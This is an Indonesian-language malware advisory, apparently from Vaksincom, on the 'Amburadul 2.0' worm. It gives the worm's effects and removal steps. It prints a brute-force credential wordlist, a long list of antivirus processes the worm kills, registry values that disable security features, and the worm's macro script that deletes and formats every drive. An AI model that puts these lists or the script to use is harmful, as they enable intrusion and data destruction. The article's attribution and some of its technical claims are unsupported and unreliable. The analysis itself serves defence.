Virus masih dalam keluarga VB & Delphi yang di pack mengunakan UPX / PE Lite dengan mengadopsi file .pif/.cmd/.bat sebagai tringger route dengan mengunakan MacroX dan mengunakan celah keamanan VNC (remote control) port 590X. Virus lokal amburadul mengunakan celah keamanan dari share folder dan network device dengan mengunakan metode ipc$, admin$, serta brute force untuk menjalankan aksinya, tiba-tiba data/settingan kembali ke semula (default), demikian file/folder yang tersharing, lenyap berserta dengan file2nya, sekaligus box linuxpun ikut dikerjai dengan beberapa exploit yang ada didalam tubuh virus.
Sampai akhir desember 2010 ini, Vaksincom mendapakan laporan lebih dari 210 pelapor dalam 1 bulan terakhir ketika virus diperkirakan menyebar lewat YM, E-mail serta situs2 jejaring social seperti facebook, twiiter dan linkedin, yang menutup tahun 2010 dengan "Virus of The Year". Diperkirakan pembuat berasal dari Semarang, Indonesia seorang mahasiswa yang juga tergabung dalam group hacker turki "iSKORPiTX" dengan nick "The Conflickzer", diketahui dari file trojan/backdoor dari badan file yang merupakan file pendukung untuk hacking dan beberapa exploit untuk mengexploitasi sistim operasi khususnya bagi penguna Linux.
Selain itu virus memiliki teknologi Multipolymorhpic yang merupakan file induk berupa karakter teracak dengan badan virus yang teracak juga, hal ini membuat sulit vendor antivirus untuk membuat antivirus yang tepat untuk virus ini. Selain itu virus mengunakan Macro Recording, dimana pada saat2 tertentu, mouse seakan2 berjalan sendiri dengan ketikan keyboard untuk menghapus seluruh file sistim/data pada komputer user. Ikuti perjalanan team Vaksincom membongkar virus Amburadul versi 2.0 ini.
1. Nama Virus : W32.Amburadul-2 alias Ambrol-II/PoisonIvy/DeadLock/MatroX/Brontx.EQ/D.ALL
2. Asal Pembuat : Semarang - Indonesia
3. Dibuat dengan : Batch File adopt dari file .pif, .cmd, bat mengunakan MacroX & AutoIt dengan kompresi UPX / PE Lite dan Backdoor / Trojan dibuat mengunakan bahasa pemograman VB & Delphi.
4. Efek : Vaksincom mencatat ada 10 efek nyata yang dilakukan oleh Virus Amburadul sesuai dengan tringger routine virus, seperti :
Menghapus seluruh file offline pada drive Z s/d C secara berurutan, dengan memberi label volume "AMBURADUL" mengunakan batchfile/macrox (port 5900/vnc)
Mengformat data drive Z s/d C (kecuali sistim) dengan menganti label selain drive C dengan "AMBURADUL" dengan metode yang sama (no. 1).
Injeksi ke Internet Explorer dengan menambahkan System Down – hacked by iSKORPiTX (hacker turki yang memiliki backdoor / trojan celah keamanan pada rpc-windows.
Mematikan fungsi antivirus dengan cara melakukan uninstall dan mematikan proses penjagaan (guarding) antivirus/firewall.
Mengirimkan informasi typing horse ke iskorpitx@yahoo.com dan conflickzer@yahoo.com berupa update status virus dan info pc terinfeksi berupa key trapped.
File induk terletak pada badan file sistim windows (svchost.exe, csrss.exe, alg.exe) yang digunakan oleh virus conficker dengan menyebabkan rpc hole berakibat jaringan down/looping.
Mengunakan Macro Recording untuk menjalan aksi lewat remote VNC (port 5900), yang merupakan bug dari vnc versi 4 dengan membypass password default.
Menginject jaringan dengan metode IPC$ pada bug sharing pada Windows dengan melakukan direktori network listing untuk menjalankan aksi menghapusan file/data.
Mencoba untuk masuk ke sistim keamanan jaringan Windows / Linux dengan mencoba beberapa username dan password dengan metode bruteforcing. Dengan informasi user/password yang dicoba sbb :
Username yang di gunakan :
- admin
- administrator
- [namakomputer]
- [namaworkgroup]
- [namauser]
- [namafilesharing]
- [namadomain]
- root
- master
- manager
- system
- sysadmin
- sysop
- SUPPORT_388945a0
- ASPNET
- HelpAssistant
dengan password dala file wordlist :
- admin
- administrator
- password
- admin123
- adm
- 123456
- 12345
- 1234567
- qwerty
- root
- [namakomputer]
- [namaworkgroup]
- [namauser]
- [namafilesharing]
- [namadomain]
- *blank*
- ..dll
Dan mengunakan teknik Bruteforcing dengan mencoba karakter A-Z, a-z,
0-9, !@#$%^&*()-{}\<> untuk menembus jaringan lokal mapun alat -
alat device seperti print server, router, access point, fingerprint, pabx,
wacom, cctv, dll.
Membuat schduler pada Windows berupa tringger aktif dan Linux berupa crontab serta injeksi registry pada file.com, .exe, .pif, .lnk, .cmd, .txt, .jpg, dengan menambahkan explorer pada svchost.exe, userinit.exe dan winlogon.exe saat komputer di restart dan mematikan fungsi system restore dan windows/linux firewall.
5. Media Sebar : Flashdisk, e-mail (attachment/.lnk) dan Yahoo messenger.
6. Security Vuln : Merusak sistim kekebalan baik oleh Windows Firewall mapun aplikasi security seperti :
A2CMD, A2FREE A2GUARD A2SERVICE, ADVCHK, AGB, AHPROCMONSERVER, AIRDEFENSE, AKRNL, ALERTSVC, AMON, ANTIVIR APVXDWIN, ARMOR2NET, ASHAVAST, ASHDISP, ASHENHCD, ASHMAISV, ASHPOPWZ, ASHSERV, ASHSIMPL, ASHSKPCK, ASHWEBSV, ASWSCAN, ASWUPDSV, AVAST AVCENTER AVCIMAN, AVCONSOL, AVENGINE, AVESVC, AVEVAL, AVEVL32, AVGAM AVGCC, AVGCC32, AVGCHSVX, AVGCSRVX, AVGCTRL, AVGEMC, AVGFWSRV, AVGNSX, AVGNT, AVGNTMGR AVGSERV, AVGTRAY, AVGUARD, AVGUPSVC, AVGWDSVC, AVINITNT, AVIRA AVKSERV, AVKSERVICE, AVKWCTL, AVP, AVP32, AVPCC, AVPM, AVSCHED32, AVSERVER, AVSYNMGR, AVWUPD32, AVWUPSRV, AVXMONITOR AVXQUAR, AVZ, BDSWITCH, BITDEFENDER, BLACKD, BLACKICE, CAFIX, CCEVTMGR, CCSETMGR, CFIAUDIT, CFP, CFPCONFIG, CLAMTRAY, CLAMWIN, CUREIT, DEFENDERDAEMON, DEFWATCH, DRVIRUS, DRWADINS, DRWEB, DWEBIO, DWEBLLIO, EKRN, ESCANH95, ESCANHNT, EWIDOCTRL, EZANTIVIRUSREGISTRATIONCHECK, F-AGNT95, F-SCHED, F-STOPW, FAMEH32, FILEMON, FIREWALL FORTICLIENT, FORTISCAN, FORTITRAY, FPAVSERVER, FPROTTRAY, FPWIN, FRESHCLAM, FSAV32, FSAVGUI, FSBWSYS, FSDFWD, FSGK32, FSGK32ST, FSGUIEXE, FSMA32, FSMB32, FSPEX, FSSM32, GCASDTSERV, GCASSERV, GIANTANTISPYWARE, GUARDGUI, GUARDNT, GUARDXKICKOFF, GUARDXSERVICE, HREGMON, HRRES, HSOCKPE, HUPDATE, IAMAPP, IAMSERV, ICLOAD95, ICLOADNT, ICMON, ICSSUPPNT, ICSUPP95, ICSUPPNT, INETUPD, INOCIT, INORPC, INORT, INOTASK, INOUPTNG, IOMON98, IPTRAY, ISAFE, ISATRAY, KAV, KAVMM, KAVPF, KAVPFW, KAVSTART, KAVSVC, KAVSVCUI, KMAILMON, MAMUTU, MCAGENT, MCMNHDLR, MCREGWIZ, MCUPDATE, MCVSSHLD, MINILOG, MYAGTSVC, MYAGTTRY, NAVAPSVC, NAVAPW32, NAVLU32, NAVW32, NEOWATCHLOG, NEOWATCHTRAY, NISSERV NISUM, NMAIN, NOD32 NORMIST, NOTSTART, NPAVTRAY, NPFMNTOR, NPFMSG, NPROTECT, NSCHED32, NSMDTR, NSSSERV, NSSTRAY, NTOS, NTRTSCAN, NTXCONFIG, NUPGRADE, NVCOD, NVCTE, NVCUT, NWSERVICE, OFCPFWSVC, ONLINENT, OP_MON, OPSSVC, OUTPOST PAVFIRES, PAVFNSVR, PAVKRE, PAVPROT, PAVPROXY, PAVPRSRV, PAVSRV51, PAVSS, PCCGUIDE, PCCIOMON, PCCNTMON, PCCPFW, PCCTLCOM, PCTAV, PERSFW, PERTSK, PERVAC, PESTPATROL PNMSRV, PREVSRV, PREVX PSIMSVC, QHONLINE, QHONSVC, QHSET, QHWSCSVC, QUHLPSVC, RFWMAIN, RTVSCAN, RTVSCN95, SALITY SAPISSVC, SAVADMINSERVICE, SAVMAIN, SAVPROGRESS, SAVSCAN, SCANNINGPROCESS, SCANWSCS, SDHELP, SDRA64, SHSTAT, SITECLI, SPBBCSVC, SPHINX, SPIDERCPL, SPIDERML, SPIDERNT, SPIDERUI, SPYBOTSD, SPYXX, SS3EDIT, STOPSIGNAV, SWAGENT, SWDOCTOR, SWNETSUP, SYMLCSVC, SYMPROXYSVC, SYMSPORT, SYMWSC, SYNMGR, TAUMON, TBMON, TMLISTEN, TMNTSRV, TMPROXY, TNBUTIL, TRJSCAN, TROJAN, VBA32ECM, VBA32IFS, VBA32LDR, VBA32PP3, VBSNTW, VCRMON, VPTRAY, VRFWSVC, VRMONNT, VRMONSVC, VRRW32, VSECOMR, VSHWIN32, VSMON, VSSERV, VSSTAT, WATCHDOG, WEBSCANX, WINSSNOTIFY, WRCTRL, XCOMMSVR, ZLCLIENT, ZONEALARM
7. Modifikasi Reg : Selain menyembuyikan dari Task Manager / MsConfig, virus ini
mematikan beberapa fungsi windows dari registry seperti :
AntiVirusDisableNotify = 1
AntiVirusOverride = 1
FirewallDisableNotify = 1
FirewallOverride = 1
UacDisableNotify = 1
UpdatesDisableNotify = 1
Hidden = 2
EnableFirewall = 0
8. File Induk : Memiliki beberapa file induk :
- [fileacak].lnk // Shortcut untuk menjalankan Trojan / Backdoor
- [fileacak].pif // Trojan
- [fileacak].exe // Backdoor
- [fileacak].cmd // Script Otomatis Tringger Routine
- [fileacak].bat // Script Otomatis Tringger Routine
Terletak pada seluruh direktory file sharing maupun [drive]:\ [windir]\system32
[fileacak] = angka dan huruf dengan beberapa case menyamar sebagai svchost.exe, ctfmon.exe, alg.exe, dan csrss.exe.
9. AutoScript : Memiliki beberapa script berbahaya dengan mengunakan MacroX dengan
mengambungkan dengan port 5900 pada VNC server (bug vnc diissue dari
tahun 2003, dapat di lihat jelas pada :
http://www.realvnc.com/pipermail/vnc...ch/037830.html
http://www.securityspace.com/smysecu....html?id=10758
dengan Script Macro yang dijalankan sesuai dengan tringger routine :
MousePos=45,755
MouseButton=1,1
Activate=Start Menu
Text={UP 3}{ENTER}
Activate=Run
Text=cmd{ENTER}
Activate=Program Manager
Activate=C:\[windir]\system32\cmd.exe
Repeat=26
Drive=Drive+Chr$([Count+1])
Text=[drive]
Text=rd /S /Q .{ENTER}
Until=0
Activate=C:\[windir]\system32\cmd.exe
Text=c
Text=rd /S /Q .{ENTER}
Activate=C:\WINXP\system32\cmd.exe
Text=format /C /Q [drive]:{ENTER}
Text=Label [drive] AMBURADUL
Wait=183
Text=LABEL AMBURADULt{ENTER}
Activate=Exit
Memiliki beberapa Script Macro dengan keyboard mapun mouse untuk menjalakan aksi dengan menyusup melalui celah vnc / port 5900/5901/2
10. Solusi : Untuk mengatasi virus Amburadul versi 2.0 ini sebelumnya kami ingatkan
agar backup data/files senantiasa dan pergunakan username/password yang
tidak baku / standar, lakukan update antivirus secara berkala.
Lakukan pemutusan terhadap jaringan/koneksi
Disable [System Restore] selama proses pembersihan
Matikan proses virus dengan mengunakan Process Explorer, cari beberapa file yang dicurigai seperti svchost.exe, ctfmon.exe, alg.exe dengan byte yang besar dan proses load processor yang tinggi serta beberapa file ext .tmp, .lnk, .sys, .drv dan file ext yang tidak standart.
Agar tidak terinfeksi kembali lakukan pembatasan pada policy windows dengan cara :
Caranya:
-. Start -- Run ketik perintah SECPOL.MSC kemudian klik tombol [OK]
-. Setelah muncul layar Local Security Settings, klik kanan pada menu Software Restriction Policies lalu klik Create New Policies
-. Pada menu Software Restriction Policies, klik Additional Rules
-. Klik kanan pada Additional Rules, kemudian pilih New Hash Rule, dan akan muncul layar New Hash Rule
-. Pada kolom File hash klik tombol Browse, kemudian arahkan ke direktori [C:\Windows\system32\[fileacakvirus.exe] dan klik tombol [Open]
-. Pada kolom Security level pilih [Disallowed]
-. Pada kolom description boleh di isi atau dikosongkan saja
-. Klik tombol [Apply] dan [Ok]
Catatan: Jika komputer Anda tidak terinstall Windows XP Professional / 2003 Server 2000 Server / Vista / 2008 lewati langkah ini.
Hapus string registry dengan mengunakan CureIt dan Repair dengan mengunakan TuneUp Utilities 2010
Jika terinfeksi virus ini, user tidak dapat melakukan booting Windows dengan muncul pesan error NTLDR Is Missing, sebaiknya dilakukan Repiar atau Install ulang.
Sementara untuk file yang telah di hapus, dapat direcovery mengunakan software Recovery seperti getDataBase / EasyRecovery / Recovery My Files dengan mengunakan type delete atau format recovery.
Hapus seluruh file virus dengan mengunakan Kaspersky Virus Removal Tools 2010 yang dapat di download :
http://support.kaspersky.com/viruses...ol2010?level=2
Update patch security terbaru untuk celah port 5900, rpc, ipc$ melalui
site microsoft : http://www.microsoft.com/downloads
Backup Data Anda sekarang juga!!! dan update antivirus!!
Akhir kata penulis berpesan kepada seluruh pengunakan PC di Indonesia, agar membackup data senantiasa secara terperiodik, jangan hanya mengandalkan program security, firewall atau antivirus karena program tersebut selalu kalah selangkah oleh program2 penganggu seperti virus, backdoor, trojan, dll. Lakukan update patch khususnya operating sisitim Microsoft Family, juga Linux disarankan karena virus mulai beralih ke sistim keamanan Linux. Tak lupa Vaksincom mengucapkan Hari Natal 2010 dan Tahun Baru 2011, sampai bertemu pada artikel berikutnya dengan pembahasan yang lebih menarik. Adios Amigos.
Read More..
